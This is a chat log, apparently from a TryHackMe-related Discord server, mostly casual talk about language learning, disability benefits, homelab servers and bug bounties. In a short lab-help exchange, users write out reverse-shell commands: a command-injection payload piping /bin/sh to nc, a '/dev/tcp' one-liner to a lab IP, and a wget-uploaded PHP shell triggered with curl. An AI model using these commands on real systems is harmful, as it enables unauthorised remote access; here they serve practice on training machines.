Shoot, i have to go
unessecary mostly, like capital letters
The ideal way to learn varies depending on the individual and the subject matter (not every subject is equal).
And it really depends on interests as well
Definitely.
haha salty cause you dont get it.... (i dont either :/)
i use semi colons sometimes like periods dont see a lot of use as what theyre meant to used for
I do it because: 1) It's a habit. 2) Proper punctuation (which is related to grammar). 3) Expressing myself clearly works best when I write several sentences in a row, which ties back to points 1 and 2.
yeah i get it dude
i use semi colons for 3
but for 2 i use grammar differently
Interesting, elaborate.
for 1 i text a lot and im not wasting data on a period
I didn't care much about grammar and punctuation until I joined TryHackMe.
sometimes i use elipses... yeah thats mostly it lol
Such an ecologist!
It's important if you want your ideas to be coherent and for people to take you seriously, among other reasons.
Fundamentally, as long as you're not completely butchering verbs and such, you don't need to worry too much. That comes from someone who doesn't fully master English either, so what I'm saying might be incorrect. I like to streamline everything (ideally).
Are you a native speaker?
No, not English.
Jabba, you wrote a whole novel
In German there's a joke/ example commonly used to explain cases.
"Cases" are used to dictate how the order of a sentence should be.
For example, in the "Accusative Case" is used to indicate the direct object of a sentence.
To indicate this, you have different forms of words.
"the" in German is "die", "der" or "das", but in accusative form, the masculine "der" becomes "den".
This means that you can have a sentence, "Der Hund beiΓt den Mann" (the dog bites the man" and you can change it to "Den Mann beiΓt der Hund" and the sentence means the exact same thing "the dog bites the man".
My joke was that I flipped it around and said "the man bites the dog", then added commentary to further the humour.
Hope this helps π
Trying to word it so that it isn't too complicated π
You?
How dheck it means the same thing
What do you mean? :)
In German, the order doesn't matter?
It does matter, yes.
You can see that "bites" doesn't move, this is because the subject has to be in the second place in a sentence
Nope
Sorry not subject, verb*
What is your native language?
This changes depending on the purpose of a sentence.
For example:
- Standard Word Order
- Subject, Verb, Object
- Question Word Order
- Verb, Subject, Object
Oh, I mean, it's like this?
The man got bitten by the dog.
The dog bit the man.
I don't want to reveal (:
"Der Mann beiΓt den Hund" means "the man bites the dog"
And "Der hund beiΓt den Mann" means "the dog bites the man"
What changes is the accusative case "den".
"Den" refers to the object, this is what is being affected in the sentence.
You've just swapped hund and mann no?
And the "Den" with "Der"
Not here? Unless I'm blind
It's interesting, no need to share then. That could imply that the language you speak isn't widely used (I am 99% sure I am wrong).
Well, it is widely used in the country that I'm in, obviously.
Correct because I am trying to show that "Den" refers to what is being affected
Of course.
Ahh okay
Did you use Duolingo to learn?
Google, YouTube and someone I met on Discord
You kid but yes I did learn German through music
rammstein?
Sonne!
No, actually good musicians
Ah fair, I'm looking at clozemasters for learning a new language - heard of it?
Namika is pretty good and she speaks fairly clearly.
Mark Foster and CRO are also alright
So rammstein isn't a good musician? Shame on you
No but I will check it out.
I want to get back into learning languages because it has been a while and my German is slipping.
Hey sup
Hi, unknown
Hi.
Are you learning it because it is fun or you need it?
Learning languages is one of the best exercises you can engage in (intellectually).
yo
I'm learning russian and after that imma learn German as well
Very nice, especially the first one.
ja ja ja
At the time I was seeing someone who was German and I wanted to converse with them.
But my obsession with languages started before then. I used to read, write and speak Russian.
I then moved to Spanish and Italian but didn't find much motivation.
My best friend speaks German and it's nice to converse in his mother tongue, but he doesn't really "help" when I speak to him π
How are you learning Russian?
ig π
juat drink vodka enough
Some do but not most.
Cool. Can you Converse in Spanish and Italian?
Oh i see, that's nice
You gotta learn it yourself! :p
No, I can in Portuguese but not Spanish or Italian.
You tube, blogs and there is an app called learn Russian.
Read poetry too and novels.
Good, as long you actually learn it properly and correctly.
Then it's awesome.
Yeah learning new language is fun.
Being exposed to a language is pretty efficient way to learn
Definitely.
That's how i learned english

And about speaking, I'm more used to British accent
US for me by far.
Why 32 bit?
but if you speak Portuguese (from Brazil) you can understand some Spanish, I can understand some Portuguese
I was checking out an old gentoo distro (build) because I enjoy inclusivity. Some folks might still be thinking in 32-bit systems, so it's good to keep them in mind.
enough for basic converstation
I speak Portuguese from Portugal.
And yes you are correct, but if you speak small amounts of Portuguese and some of Spanish overlaps with Portuguese, the amount of Spanish you'll understand is a very small percentage.
I do speak Spanish but not enough for me to confidently announce that I can have basic conversations
And Italian is mainly swear words courtesy of my closest friend
The best way to impress while also annoying your teacher is by submitting all coding exercises in assembly language, and so forth.
The best way to learn π―
Lmao, that's risky
They might give you an F
"0/10, did not follow the assignment brief"
Just because they can't read it
I agree. But a passionate computer teacher would likely inquire about the reasoning and method behind submitting coding exercises in assembly language.
Especially if it's well coded.
I used a long if statement and my prof gave an F
Is there any website where I can find good info about computers? Like any basic theories about computers and cyber sec
I mean like
a && b || a && c
My parent had a time share in Brazil so I spent a lot of my summers there, also because of the Spanish I can understand Portuguese but I understand more than can I speak, but from Brazil, Portuguese from Portugal it's a different beast π
please avoid those
why?
hard to read
Certainly, but ultimately, who cares? Learning holds greater importance. If someone is already proficient in coding beautifully crafted assembly code, they're likely well ahead in the game.
nu
You mean computer architecture?
also the a can be factored
It's actually a really nice language but my kicker was that it sounds like Spanish but isn't at all like Spanish (they also don't like it if you speak Spanish to them ahahaha)
Well, yeah it's not a clean code
Yea smth like that
They're the only words you truly need
Not necessarily, you can learn assembly without knowing a clue about other programming concepts
And i made the fastest solution for an algorithm question, and got the least grade
The whole point is to show you know what they are specifically teaching you
@shut hawk Not sure I see the learning factor in this website.
It explains when you get it wrong but there isn't really a "path" for you to learn.
It's good to consolidate your understanding it seems.
Yeah that's the whole idea around it, it isn't a linear structure
Begin with the Von Neumann architecture as the foundation, then delve into the evolution of computing (technically). Understanding it well and then move to more recent architectures. To truly grasp the essence of C programming or any high-level programing language, delving into assembly language becomes imperative.
Yeah but there isn't exactly a pathway into the language either
Thanks man π
Gave +1 Rep to @signal nimbus (current: #550 - 7)
People from Brazil they are used to π they're surrounded, also long time a go Argentina was in more or less a good economic situation and Brazil was very bad, it was cheaper to go to Brazil that go to the coast in Argentina, so there was a lot of tourism from Argentina.
Mhm, kinda just throws you in the deep end
today is the other way round probably π
For a competitive platform it's great.
I'd recommend Duolingo or Busuu to most learners.
Or join Discord servers with the language you want to speak and talk to their members
check https://www.italki.com/
Okay, cool cool thanks
Gave +1 Rep to @mossy river (current: #6 - 1149)
Let me look
Yeah Duolingo doesn't have my language π
I mean, if a person already possesses such skills, this is indicative of their mental capacity and aptitude for learning. In this case, the teacher should indeed encourage and foster this type of thinking and expression (especially if it involves well-designed assembly code). Beautiful assembly code is difficult and not trivial to produce. If I were a teacher, I would try 100% to understand why this person sent me this code and how he or she learned it. Maybe I'd ask that person to implement what I teach in assembly code and so on, as a challenge.
Slovak?
Yeee
A true teacher always finds ways to stimulate and convey the material directly or indirectly.
I mean, it may be impressive if you are able to do it but it still doesn't show the teacher any evidence of you knowing what they are teaching you (unless that's assembly of course)
Okay guys thanks for talking. Have a great day. I gotta go.

Jk, but my mum never speaks in it because none of us understand her
Have you told her you want to learn the language?
She should have raised you in it tbh
She did try!
For both of us, but my dad doesn't speak it
And I could barely learn English
She should speak it with you, I have a friend that his mother is French and his dad is from Argentina, his mother spoke French since the day he was born and his father Spanish, he speaks both languages perfectly π
Understanding assembly language coding well shows a deep understanding of memory management, computer architecture, and more. It also suggests that the person has the intelligence to handle something tougher than what's taught in the course (by a mile). Even if the course is advanced, the teacher would likely admire that extra effort.
Most computer science students can barely code in C let alone assembly nowadays.
It's really funny seen him interact with his parents, speaks french with his mom and he turn around and speaks spanish with his dad π
Eh, agree to disagree
Lmao
More and more, computer science degrees seems to be leaning towards web applications, almost like it's moving towards web app software engineering.
What language does he speak when he wants to communicate with both of them?
Nice website but there are much cheaper ways to learn.
I guess learning with a tutor is much more effective though?
isnt that normal with people who speak multiple langs
You can't really compare tutoring and duolingo imo
Mhm but you can find tutors on Discord that are free.
Or enroll in a free language course at your University
I didn't.
you can practice for free, I used it more for practices than learning
Hmm this is fair, although with tutoring you can still get 1 on 1 support vs a uni
Yeah my bad, I saw you mention those earlier
You get 1 on 1 support at University π
You have to first enroll do you not?
Like you have to enroll into university, the institution
Yes, I said "At your University" as I was talking directly to Jayy in my response
That is even if I go to uni
I have quite a lot of options lined up, still need to decide
Personal tutors are great and I would always recommend you to go with them if you can afford it.
But, I am not a fan of virtual learning.
Ohh yeah I've heard that a lot. I get why people don't like virtual tutoring but it's super good accessibility wise
I'm a big fan
They've been living in France for many years but it can be a mix, because he speaks French for being in France for so long and she speaks a kind of intermediate Spanish because of her husband and son (she always wanted to know what her husband and son were talking about π )
Universities are notoriously not accessible here so it's a headache even entering the building
There is a website that does in person tutoring for languages.
But it took so long to try and set up that I gave up
Oh that sounds cool
It was also v/ expensive.
My friend from the uk worked at a tutoring place for a bit, are those common? Not sure what they're called
Basically helping kids with whatever subject they're struggling with
Although I think that's kids and teens only
sometimes when one parent speaks a language and the other doesn't they speak to their child in common language with is a shame because their are robbing the child the opportunity of learning another language
It is super common for University students to join these companies.
They are online and you can do it from your room, all you need is a background check
I think he did it at a physical place
well we keep mixing 3 languages while talking so π
Tutors can be effective because they're able to dynamically shift focus based on what you're specifically struggling with. Where as a class or seminar has to target the lowest common denominator.
I did some tutoring for... 8 I think, of my classmates in network and systems security course I took in college back in '08
I got a lot of out of that arrangement; because it gave me an opportunity to understand some other perspectives on the materials, so I had to gain an even better understanding to break down the parts that seemed intuitive to me.
These days, if I'm looking for more specific information, I tend to ask a GPT if I have some baseline understanding already, because I can generally figure out/test the quality of the responses while learning the bit I'm missing, but you can't trust a GPT fully.
true i'm also go to universitie for B.sc cyberscurity but they even not tech basic cyber scurity
By accessible i mean no ramps and elevators
I physically have to be carried into a building with stairs only and it's horrible every time
Like should I get a bachelors in compsci? Probably. Do I refuse to for the sole reason of dealing with enough accessibility issues as is? Absolutely π
https://www.explorelearning.co.uk/
This maybe? They have physical places
Maybe! Not sure
Appreciate the insight!
I am unaware of any in person places.
I know they exist but the majority of people I know do online tutoring because of the accessiblity
My brother had a mathematics tutor which was in person but he would drive to our house
He taught so it may be a small business
if you're in the US, that's basically illegal
file a discrimination suit
I'm not in the US unfortunately
ah damn
Probably the only context I could say this in
Canada has similar laws, and Europe is a bit backwards on that end though
That sounds horrible Aquilo, I hope it gets better
Comparatively at least. America has a bunch of disability issues as well, like the 2k money cap
They've been trying to push legislation for years to change it to 10k, but basically if you're on disability benefits you cannot have more than 2k in assets or in your bank account. It's wild
best way study like u did in first grade?
It won't but its cool I'll move in a couple years π
I hear Canada is pretty good. Cold though eh
I think this also includes stuff like property
don't go to winipeg is effing π₯Ά there π
I bet
I have a friend who live there once I went to visit him on winter damnnnnnnnnnn π₯Ά π
I hate cold
So if you own a single computer, youβre just done?
not a computer, savings and assets
that's crazy
Canada is good, but has its issues, one of its biggest is a growing number of people trying to emulate 'murica.
On the disability front, it's a mixed bag.
ODSP (Ontario Disability Support Program), is attrocious.
Won't cover even half of what it costs to rent an apt somewhere that you have access to all of the auxiliary support programs that make life more liveable.
Net worth cap of $5000 or lose access to program.
If you get married to an able person, you lose access to the program and are essentially their property and problem in the eyes of the law.
If you live in a space with "the opposite sex" you will be regularly accosted that you're in a relationship, and are going to lose disability, you have to periodically sign a letter that states you are not in an exclusive sexual relationship with the person. (If your relationship isn't exclusive, then the common law marriage laws are harder to apply against you. Of course if they are actually just a roommate, common law marriage laws don't apply, but they'll still try to get out of their obligations this way.)
I see, I thought βassetsβ includes a lot more then it apparently does. Regardless, 2k is literally nothing.
We recently passed the "MAID" act (a couple years now). It's essentially a eugenics for disability act, and has been used for those who are on disability to escape debt by escaping the mortal coil.
that's wild wtf, you literally have to avoid partnership to keep living (on paper, obviously disabled people will just lie here for good reason)
I have a LOT of opinions about the MAID act, and assisted dying vs euthanasia in general. Although probably not appropriate to go into it here. It's abhorrent
Oh yikes.
It's so-so at best right now.
The economy is tanking.
Issues with laws and so on.
Crime rates are increasing, and if you defend yourself, you risk facing immediate charges (because self-defense laws).
The healthcare is atrocious (especially in some provinces).
I wish Canada would be like the USA.
Yep, and there's always the question of intent vs. application. Though you always have to assume that if reprehensible application is involved, that was someone's intent.
Anyway yeah, my ex is on disability program, I navigated that system with them for a number of years.
And this Saturday I'm helping a disabled (wheelchair bound) highschool friend of mine pack up because they're moving to Germany. They would've been a good candidate for a C-Brace 10 or 15 years ago, but without regular access to transportation and physio here, they're not currently a good candidate. π’
Oof, why?
It's so much worse there.
In most states, you still get charged in self-defense situations there as well BTW.
Ooh C-Brace looks super cool!
Good luck to your friend, moving is tough but totally worth it i feel
In Canada, the situation is quite different. By default, you will face charges automatically if you find yourself in a case of self-defense.
Economically speaking it doesn't make sense (fundamentally).
The real estate is borderline radioactive.
It varies state to state, but the same happens in most, unless under very specific circumstances. (See castle doctrine)
Which is way better.
Oh dear
You can't protect yourself.
I can, and will, and I'll be out on bail within hours, and my charges will get dropped when the investigation is complete.
Which is the same as most people in the U.S. go through, unless it was a home invasion.
I've encountered many people in the US, and believe me, when I hear their stories, it's nothing compared to what you might go through here if everything goes smoothly.
Do I need to step in here?
Why?
We tend to avoid political issues in this channel
Sure thing.
And this looks like it may degenerate if it continues
They don't seem irrational, and I don't overreact.
Yo, Oatmeal hits hard
I have serious doubts, but if it's not acceptable according to the rules, we will stop then no problem.
TMI π
Most violent crime in North America is not home invasion.
It isn't what the media you're consuming wants you to believe it is here.
The statistics do not support your claim, and neither does the case law.
(This is Toronto specific, as the most densely populated city in Canada.)
People are literally getting shot down the street. Someone just died accidentally (wrong target).
Rolls on the floor laughing
Have you looked at gun violence statistics from the US?
Why in the world would you want to emulate that?
I would 100% live there if I can actually protect myself lol.
I want to emulate the US economy.
Which is way more active and has way more potential obviously.
because they don't have enough Israeli people there π π
In my experience they're not.
In the tech centre I see them all of the time in the GTA, they do well, then they sell, yes usually to an American company, but it's not a reason to go there.
My parents have lived there for some 20years, greencards the whole bit.
They're looking at moving back up here now because they do not like the way things down there are going.
I hope, they will at least build the economy and create remarkable things.
I don't know because you are literally being punished here for working hard.
I won't touch the Gaza strip or anything close to it with a 10foot pole on this server.
The grass is always greener, until you get to look from the other side.
The average startup often doesn't continue due to policies, heavy taxes imposed on them, and a government that appears indifferent to its people's needs. Comparatively, economically and in terms of work opportunities, the USA outshines other places assuming you're reasonably competent. In the US, you can promptly access medical care if you're willing to pay, and it's not excessively expensive.
Startups are literally opening every single day, and the harder you work economically, the more you are rewarded, quite literally.
The richer you get in Canada, the more you are taxed and urged to remain at a certain level (even with moderate salaries). Consider being taxed at 40-50% and still encountering healthcare issues.
Israel is call the start-up nation, hence my comment. No need to it go to Gaza sh*t, I live it and nothing you can say from your knowledge from TV can cover the subject, also I have enough of that IRL so I'm not in any mood to discuss it here with people that don't know anything about that. That's my last comment to this
I don't know frankly speaking, USA is way better on many levels.
Yep, affordable.
Israel excels in technology and scientific advancements, consistently achieving remarkable feats which is awesome (I really like that).
Now, if you check the average remotely decent job, you'll find that most offer insurance as part of their benefits package.
They always have that argument against the US.
do i really need to learn data structure and algorithm for bug bounty? or just a basics of python and web D.?
having insurance tied to a job is a terrible idea, btw
You don't have to learn coding for cyber security
But it is indeed beneficial
Which is part of a benefits package.
but lets stop right here
For bug bounty, I'd recommend learning PHP
And even then if you get paid very well you can easily afford it on your own.
You understand how a tax bracket works right?
That the higher percentage only applies to the gross income in excess of the lower bracket.
So if you make $150,000/yr in Canada
The first ~$54,000 is at 15%, the next ~$50,000 is at 20%, the next $60,000 is at 26%
Our maximum tax bracket for 2023 is 33%... for income above and beyond $235,000.
Are you even affected by that federal tax bracket?
Sure.
Yes I definitely do.
Unless you're in Quebec*
but that's a different problem
anyways
Anyway, interesting conversation haha.
gonna kill it right here though, next ones to start it up again will get mutes
I mean this is a discord server about IT and cybersecurity, so I get it.
right
Where did you see that?
for some that is the only way itβs affordable. Do to my wife being type one diabetic, insurance out of pocket for her alone we were quoted the lowest we would need 1800 a month
and sheβs 20β¦ it would get worse as she aged
sigh
Learn OWASP top 10, Web development ideally and so on.
Also consider checking portswigger.
she too young shii gonna get worse
It's better than not having it, but it's worse than having a baseline support system that prevents corporations from owning you in the first place. Not everyone wants to work for Arasaka.
guys.
Lets stop. Hydra asked us to stop. I missed that message
Listen to hydra or they will crack your passwords
never realized how much Hydra's green blended in with the rest
Mod green is bolder.
OWASP top 10 is lit. As is Juice Shop
Juice shop can do one.
Still waiting on thr delivery.
yeah it's pretty close, there's a shield on !compact mode
I've always appreciated reading this message whenever you utilize the software: Please do not use in military or secret service organizations, or for illegal purposes.
Since they ask so nicely
I suggest you follow that advice
Certainly, the inclusion of "please" truly altered the entire dynamic.
They said please.
i on compact tho πΆ
I used to be caught off guard by the military part, but I guess military does probably have their own methods of bruting
no shield on desktop for me
same
And you can always spin up your own Juice Shop from the project's page to get more up-to-date versions than are hosted in THM rooms if you're just trying to focus that specific skill set.
(So do the room, for the guided learning, then tackle it over and over to see what you can find, either on room, or on your own env)
Juice shop is a pretty good practice lab
I can see the shield with no problems
It's likely because someone indirectly or literally experimented with software similar to it on a military installation.
Compact is minimal display
I was showing what it looked like for us
Discord is weird
Compact mode = more messages to read
And the Military probably doesn't care about the pleasant request, but the devs put it their, hoping it prevents people from blaming them for use of the tool.
But yeah, if you ever watch JH, half the time he'll just write his own loop in Python to accomplish the same thing x'D
It looks like IRC
So If I declare war on OWASP Juice shop, I can't use it?
I mean hydra isn't a super complex program to redo
IRC is more compact
looks like shields don't show unless you also show avatars
g'mornin
so real compact = no shield
correct
Icons won't show no.
Hi.
and I will side with Juice
ello, wassup?
π
Doing good and you?
Is the juice fruity? Full of zest?
Attac box
been outta sorts for past three days, it all good rn tho
CTF Builder?
Glad I could help π
It's got a makeover π
That's good I am glad, there's nothing better than being in a good position/state of mind.
Elegant colors
CTF builder is neat
should've taken those meds earlier, i concur
I see and understand, even though I don't take any myself. I do have some minor issues (nothing bad of course).
I could probably address it, but I prefer not to (it will just cause issues down the line).
me neither. just like toughing it out but past three days were unpleasant
what kind?
I have racing thoughts, and let's just say it makes sleep impossible.
for migraine
hyperactivity?
I have hyperfocus, but I don't have ADHD though.
like a superpower going haywire. but nothing as good as sleep
yeah xD
Certainly, it has helped me numerous times, but let's just say my mind is its own enemy.
People often only see the positives; they don't see what goes on behind the scenes.
But it's nothing compared to what some people go through.
I don't complain, I am fine.
AHHH THINCLIENTS!
Begone Devil!
Makes sense, it prolly is too much for human brain to handle all that info being dumped at rapid speed(is what I think hyperfocus is)
The reason why it's that not bad it's because I can handle it.
I have Low Latent Inhibition (long story).
For the average person, yes definitely.
Many go crazy actually.
Beerise, all the store computers are thin clients, bar the 2 host computers.
Me watching my amazon order being 2 stops away

Then delayed till 10 pm (happened so many times to me).
They are just dumb terminals though connecting to the hosts. They generally last about 5 or 6 years before borking out
As long as they don't deliver an empty box COUGH UPS COUGH I'm happy
still waiting for that sever π π
On the plus side, Sounds like you had a fun day in Canada with Emma
We had Thin clients at my old job, still hate em with a passion, but I can see how it saves on money and electricity
Yah.... I gave up hope on that one, if I get it, cluster, if not. Oh well
Yeah, I'd not use them for anything important. They are like... Stormtroopers of the computer world
Nothing is more frustrating than unboxing a printer cartridge when you expected something 10 times its size.
At least Amazon customer service is nice.
Oh 100%.
Besides the French ONLY gas pumps
They have racist gas pumps?
π
brrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Esqy!! How are you???
Just procrastinating the last little bit at work. Then gotta head to my sisters house to fix her washing machine
Problem was probably with the back-end infrastructure if you were frustrated with it.
Dumb terminals are only as good as their supporting systems.
hope it goes well
Shei - I'll be directly involved. Of course it'll go well π
Yah, so in college, took a science class, they had thin clients in the testing room, and it was SLOW as fuck
the real problem is when the dumb terminals are operated by dumb people π
I said "screw this, I'm bringing my own laptop"
From what she described, its either a bearing or some change rattling around between the drum and the cover
Sometimes I don't understand deliveries. Like. You're on the other side of the road, then you past me to drop off another package, then circle back to me.....
WHAT?!
once I order 3 thing, the delivery guy comes and bring me only one, I told him what are the other 2, he told me I have only this, another guy will come with the other 2 π
did you tip them? π
They just tossed my new headset... breh
Hello everyone.
this isn't America we don't have tipping fever π Tipping is for restaurants and a gift for great service not an obligation.
Howβs life?
How are you bit?
agreed!
t minus 6 days and 6 hours
Bored, mostly. I only read boring stuff at work all dayβ¦
Hopefully will get to actually do some hacking or something this evening.
How about you?
waiting for some money that is suppose to come so I can go to visit my mother and be there for her birthday
I don't really know how much I'm going to get, it's a tax thing, I have some debt in the bank so depends how much I'm getting minus what the bank is going to take that decides if I can afford the airplane ticket or not the waiting is killing me,
I'm excited for you to visit MommaRex
I hope I can, I haven't since her since 2020
Waiting in suspense is the worst kind of waiting.
ya know what's really suspensful tho
Suspenders?
there are some family issues as well so I'd love to be present there to support them
You got nephews, Neices and cousins you can bring international candy to?
Stressful.
nobody is married π
Re ordered, or they found 'em?
I forgot to print the Bill of Materials so I need to figure out what goes where
Was a lovely clear day today - I imagine cloud cover would affect your alien transmissions?
I don't think they lost them
Apparently it can, limited impact though
Do other signals impact it at all, like ones on a different frequency?
Is there spillover from adjacent ones for example?
Nah they're pretty good at allocating bands for that
And with a dish, it's very directional
Have to have it pointed right
Just so happens that the Sky satellites are close enough to the ham radio one
I remember when I was kid, a neighbour of mine was from the middle east, and he had a ginormous dish in his back garden to get the TV channels and stuff from there
The thing was the size of a shed
maybe he was looking for aliens π
Yeah, My initial thought was that he was some sort of secret agent. This was about 30-odd years ago, so it's probably just how big they were back then
For a few month a long time ago I was a volunteer for SETI π
then I got bored π
Big dish means it collects more waves, so you can detect weaker stuff
Sat stuff is cool but I don't have the space or money to do a lot
I thought the moon was made out of cheese π
The Clangers live on the moon
does that stop carving it into a dish???
Use a big crater?
When I was very little I said to my mum when I'm older I'm going to the moon and I'll eat all π
Obviously nowadays it's not something his dad would need. I feel like the dad might have been a diplomat or something. Was a really nice house, and it would make sense if he needed expensive gear like that to keep up with events live
Stateside they use different TV tech that needs bigger dishes and stuff
Might be that
How do you guys get yourself motivated to do stuff you donβt want to? Asking for a friend.
Like, stuff that takes a long time.
I don't.. and that's a self discipline
Uh idk
You don't need to be motivated by anything other than the fact it's got to be done
I guessβ¦
Yoink!
I hate the taskbar on top
Good job it's my vm and not yours then π
LETS FUCKING GO!
zfs will eat half that
Oh don't worry, when I was at 128, it was eating 60
Wonder how hungry it'll get at 256 π€
28 cores, 56 threads, 256 GB ram. 32 GB PFSense. I'm drowning in Ram
I give it a week and you'll break it.
TrueNAS?
TrueNAS scale
I kinda broke a VM that's hosted on the server

No snapshot?
Clones
Did my stuff, cloned it before I was doing Pterodactyl... now I'm being told to start all over, oh well.
This is my dev box at work, I want to take it home x'D
Might be a bit noisy though.
Where'd you find your gear? Ebay? Know a reseller?
Best I can do is Xeon E5-2699-V4
Yeah, the Xeons a much more common platform still. I think it'll be a couple years before I see a config like this to buy on used market for home.
22 cores, 44 threads per. So I'd get 44 cores, 88 threads.
weak
The problem with working in tech, you see the stuff but never take it home x'D
OK Mr no server at home. What do you got?
Or you take it home, and never play with it.
raspberry pi and a razer toaster
So true.
And no clue what to do with it.
But can your Razer Toaster run "I am Bread"?
I don't know but have you seen cooler toast?
Right now at home, I just want my media server, squid proxy w/ steam caching, pi-hole DNS server, and some sort of, likely ZRaid based storage solution.
Don't even need all that much grunt.
My Edge Router-X is decent, so probably won't bother going with [PF|OPN]sense until I move and have access to a faster uplink.
A yup.... I upgraded from 2620, 8 cores, 16 threads, so 16 cores, 32 threads, to 2680 14 cores, 28 threads. 28 cores, 56 threads.
No, no I have not
I mean, I can just host basically endless amount of VM's on the server
Why? Idk
If equivalent GPU grunt was available, I'd say set-up hash cracking web server?
Or maybe a personal @ home LLM?
cries in no GPU in server
Why are you missing that out?
1U server, no room anyways
Hello all
L
To mess with PFSense today, or relax
to finally finish theming rofi or to relax and game all night
Anyone got an idea why would a Reverse shell on either /bin/sh or /bin/bash would return nothing when i type in a command ? no output (i got the reverse shell working and connecting)
Screenshot?
sure gimme a sec (waiting on the attackbox to launch again )
I guess because you don't really have a shell yet
@feral kindle
whats good
im finishing burp room rn
Nice
I hope it's the new one and not the old ones
are you far in thm ?
If you have PIE enabled on a binary , how do you find the libc base address, i get how you get the .efl address by subtracting the leaked one and the the offset you find, but how do you do that for libc?
5 pathways finished but I took a long break and forgot everything so im getting back into it

thats good, take notes also bro
We'll know better once screenshot, but a missing redirect somewhere perhaps?
my notebook is already full and i didnt finish complete beginner
lol
Synapse is killing my PC rn
no thats me
Yea I have days when I review every single room I finished just for a refresh
I'm guessing you meant to post this in two different channels/server
You wish buddy
yeah good what path are you willing to complete first?
i start with complete beginner but im tired about those OWASP ahaha
so long
nonono, I meant Synapse is killing me
You are my PC?
correct
I finished the first 5 in the list that Shadow created, check the pinned messages here
work faster smh
then feed me more
you deprive me of my needed components for peak perfomance
So its this room, it gives a site thats open to Command injection as in u can type "& cd ../../../ & pwd" and itll return the output as text, i openned a listening port nc -lp 5555 and did "& /bin/sh | nc myip myport" and i recieve the connection on my end and i have an open shell to type in, but whatever i type returns nothing
who also got the 30 day streak π
@lone thistle Can you pop a shell on this?
In the meantime, have you tried a different payload? And where did you get that payload from?
i tried with bash, with other things before, they all resolve to the same shell, and you can run pretty much anything, tried changing dirs making files all
Have you explored the possibility that you just can't get a shell?
There are plenty of things that can prevent you from getting a shell
IIRC you can
You can always upload your own /bin/sh static binary and try executing it that way but I don't think that's the problem and it also seems massively out of scope for this room
When i get the the shell hooked on i can type commands and it registers them, then give me a new line
and once i cut the server it outputs the history of all my commands
but no output
r&b? eh?
It's not as simple as a command though
I'll never understand why rave/ hyper pop/ techno is popular when users do boxes
the hype it makes
hi @ all
this command isn't giving you a shell as such
Yea ur prolly right, time to move on to other stuff, Thanks a lot for the answers btw !

I can't find the TryHackMe playlist someone made
How so ? if you mind explaining a lil bit more
When you have no forks so you eat pasta with a spoon....
quick question. how can i see what user running what service on the system in powershell? does anyone know?
Have you tried this?
Try something like this? sh -i >& /dev/tcp/10.10.222.85/5555 0>&1 What scrubz is saying though, is there is a possibility it terminates the command after a certain amount of time (or similar preventitive measures) to prevent stuff like this
At least thats what I'm thinking of, may not be what scrubz is saying
normally it would show the termination though
Sure
thanks for the hint for the right direction π i will give it a try

I had someone last night tell me that a server worm wasn't real and that they had made it up
They then insulted my ability
I actually lost it
The command you use to get a shell will time out.
You can't use it. as it may not be present on the box.
I took a php rev shell, put it my details.
I used the wget from Diagnose it wbesite to take it off my my VM with a python server.
I think used curl http://$targetip/shell.php`
Then caught it on my pwn cat, which returned /usr/bin/bash
I don't know why only one picture is showing, but there is 3 there
ew pwncat
I can do it with nc if you want. lol
isn't that the one made by that one YouTuber with the luxurious beard
I mean that one YouTuber I never watch or smth
No idea tbh
Is it not made by John Hammond or is that another tool?
Did you see my post and understand a little bit more?
ah, okay
Im reading it right now lol, i'm still new trynna see bit by bit thanks a lot man
If you need step by step screenshots so you can follow along with nc I can.
I'll DM them to you though, So I don't clog up general.
yes please i'd be grateful for it
π
Good evening Tim.
A wild tim has appeared in the chat!

Lmao the worst nightmare
How does that even happen
Sup chat

I got snackies!
I have evening shift right now
Fine. I'm not disappointed with at this precise moment
I am off at 2300 and home at 0130
which means bella is in bed at 02:00
Not an expert but that does not sound healthy
It's just one day
Tomorrow I am home at like 1700 and then I gotta make meal prep, after I have gone shopping, then eat and sleep at like 2000
really leaning into this adulting
Yes
lol it's fairly useful
Some of the tools, there's loads more
isn't it just cyberchef
I think I posted a link to a public version in #resources couple weeks back
Is GitHub trusted
As a resource, yes. But you gotta look at each tool and use the ratings and stuff to make your own decision
I see
Whatβs the tool?
Built in Mac address lookup and chmod calculator. Fucking love it
nah that's pretty normal tbh
it's how we do things around here
Contact generator?!?!?!?!
it's a great resource, but after you learn how to convert, and only when you're in a hurry if you're using that from day one, you'll be a slave of the converter and you'd never learn
hey there if I have questions concerning a module that doesnt have a discord channel where should I post that kind of message ?
GitHub just hosts code
Oh so you ainβt downloading anything
Unless you use the code
yeah just browsing is perfectly safe
github is (unfortunately imo) owned by microsoft actually
Really?
GOOD. I hated that bull shit IP to Hex to Binary back go IP
Wow
forget when they bought it but yea
2018 it looks like
one of the few things microsoft hasn't burned to the ground yet
I love it π
π
I'm sold
can you put negative K
Let's see
Bruh what even is a romer
nice
somebody who is danish may know π
Oh @chilly veldt
My physics teacher is danish, I'll ask em heh
also Swiss
Some Swiss factories using that scale for measuring milk temperature during cheese production
It's a mystery how much you learn when you study for your Sommelier exam π
RΓΈmer?
it's name after some Danish scientist
Exactly
Or maybe is FOR ROME
Ahhhh, yeah, it's a temp scale using saltwater
did i hear roman empire
You sure did
Or a really salted solution
I honestly thought that I'd never see that in my life, but life it's full of surprises apparently π
Lmao
my doctor said to stop using salts tho
π
It's just the scale that it freezes at 0 and boils at 60
Yeah, salted water, not fresh water
hello is bug hunting worth it?
is it worth it? yes
Nope
will you make bank? no
yeah or not
Define worth
why do you want to do it?
^
As a side hobby yes. If you wanna make it a career find a company that does it
Day 1004750 of f darktrace
waste my time in order to make my pocket money
I hate it
do not view it as a reliable source of income
How much experience do you have in theis field?
i make some money from it, but i'm not gonna quit my day job. i do it because i literally get paid for getting better at it
Gotta save for that new Bike π
why practice for free when you can get paid to practice
like im a noob for now , but i feel my self food in it , get a reward of 1000 of finding an idor

1k is fine for an idor
Ahahahahahaha
How quickly would a simple idor be found, do you reckon?
Good luck
hell, i've gotten that just for being like "hey guys, exif geoloc not stripped btw"
Have you had your share of branded t-shirts and pens aswell?
not from bounties but from a handful of vendors
I got my good share of t-shirts
who knows, fair amount of luck to it
Due to CTFs
could be 5 minutes could be never
no cheating
Yk what would be a good room idea. A bug bounty room
keep in mind, how many other people have looked before you?
true
the point is, something like an idor is quite low hanging fruit. And productivity just stole my thiunder π
It's just web stuff though
Like nothing new will be covered
True
OWASP Top 10 would be a good room for it
woke up today with 2 massive scratches down my forearm
A cat
